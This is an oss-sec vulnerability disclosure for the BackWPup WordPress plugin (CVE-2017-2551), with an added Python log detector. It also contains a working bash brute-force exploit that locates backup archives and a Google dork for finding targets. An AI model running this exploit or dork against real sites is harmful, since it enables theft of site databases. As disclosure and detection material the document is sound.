oss-sec mailing list archives

Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 27 Sep 2017 12:13:47 -0400

Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID: CVE-2017-2551
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string in the name of the storage directory it creates under wp-content/uploads/, which in most WordPress installations allows directory listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file, as the rest of its name is just a date and time stamp. It would take a maximum of 86400 tries to guess whether a backup is available for a given day.
Filename format:
backwpup_<RANDOMSTRING><BACKUPNUMBER>_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Two digit month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup
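As an added illustration (not part of the advisory or of the BackWPup project), the following Python picks out both observable stages of the weakness described above in web server access logs: a successful listing of /wp-content/uploads/ (which exposes the random key) followed by a burst of 404s on archive names matching the filename format. The log lines, IP addresses and key are constructed.

```python
"""Spot the two observable steps of CVE-2017-2551 abuse in web server access logs:
a directory listing of /wp-content/uploads/ followed by rapid guessing of
BackWPup archive names (key leaked by the listing, timestamp brute-forced)."""
import re
from collections import Counter

# Constructed sample access log in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Sep/2017:14:02:11 -0400] "GET /wp-content/uploads/ HTTP/1.1" 200 1534 "-" "curl/7.55.1"
203.0.113.7 - - [07/Sep/2017:14:02:12 -0400] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-07_00-00-00.zip HTTP/1.1" 404 0 "-" "curl/7.55.1"
203.0.113.7 - - [07/Sep/2017:14:02:12 -0400] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-07_00-00-01.zip HTTP/1.1" 404 0 "-" "curl/7.55.1"
203.0.113.7 - - [07/Sep/2017:14:02:13 -0400] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-07_00-00-02.zip HTTP/1.1" 404 0 "-" "curl/7.55.1"
203.0.113.7 - - [07/Sep/2017:14:02:13 -0400] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-07_00-00-03.zip HTTP/1.1" 404 0 "-" "curl/7.55.1"
203.0.113.7 - - [07/Sep/2017:14:02:14 -0400] "HEAD /wp-content/uploads/backwpup-a1b2c3-backups/backwpup_a1b2c301_2017-09-07_03-15-42.zip HTTP/1.1" 200 0 "-" "curl/7.55.1"
198.51.100.4 - - [07/Sep/2017:14:05:01 -0400] "GET /wp-content/uploads/2017/09/logo.png HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Archive layout from the advisory: backwpup_<KEY><BACKUPNUMBER>_%Y-%m-%d_%H-%i-%s inside
# the backwpup-<KEY>-backups directory; the same KEY appears in both names.
ARCHIVE_RE = re.compile(
    r'^/wp-content/uploads/backwpup-(?P<key>[A-Za-z0-9]+)-backups/'
    r'backwpup_(?P=key)\d+_\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}\.\w+$')
LISTING_RE = re.compile(r'^/wp-content/uploads/?$')


def parse(log_text):
    """Yield (ip, path, status) for every line that matches the combined format."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], m["path"], int(m["status"])


def analyze(log_text, miss_threshold=3):
    """Return (guessers, listers, served): IPs with >= miss_threshold 404s on archive
    names, IPs that obtained a listing of /uploads/ (the key leak), and archives served."""
    misses, listers, served = Counter(), set(), []
    for ip, path, status in parse(log_text):
        if LISTING_RE.match(path) and status == 200:
            listers.add(ip)          # uploads/ is browsable: random key is exposed
        elif ARCHIVE_RE.match(path):
            if status == 404:
                misses[ip] += 1      # a guessed timestamp that did not exist
            elif status == 200:
                served.append((ip, path))  # a backup archive actually left the server
    guessers = {ip for ip, n in misses.items() if n >= miss_threshold}
    return guessers, listers, served
```

Any IP in both the listers and guessers sets has performed the full sequence the advisory describes; a non-empty served list means an archive was actually downloaded and the database should be treated as exposed.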


Exploit Code:
    #!/bin/bash
    #Exploit for Wordpress Plugin BackWPup v3.4.1
    #Download https://wordpress.org/plugins/backwpup
    #CWE-552: Files or Directories Accessible to External Parties
    #CVE-ID: CVE-2017-2551
    #Google Dork: inurl:wp-content/uploads/backwpup


    #Add banner about vulnerability

    KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`

    #Add error checking here
    echo "[+] Getting Unique Key $KEY"
    DIR="backwpup-$KEY-backups"
    echo "[+] Checking directory $DIR"
    WPATH="$DIR/backwpup_$KEY"
    echo "[+] Creating Path: $WPATH"
    #use date command here for the default date of current day
    MONTH=09
    DAY=07
    YEAR=2017
    Z=0

    echo "[+] Scanning website for available backups:"
    for y in `seq -w 0 23`; do
            for x in `seq -w 0 59`; do
                     Y=`echo "scale=2;($Z/86400)*100"|bc`;
                     echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
            for z in `seq -w 0 59`; do
                     Z=$(( $Z + 1 ));
                     CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
                     RESULT=`curl -s --head $CWPATH|grep 200`;
                    if [ -n "$RESULT" ]; then
                     echo ""
                     echo "[+] Location $CWPATH Found";
                     echo "[+] Received $RESULT";
                     echo "Downloading......";
                    # wget $CWPATH
                      exit;
                    fi;
            done
            done
    done
    echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup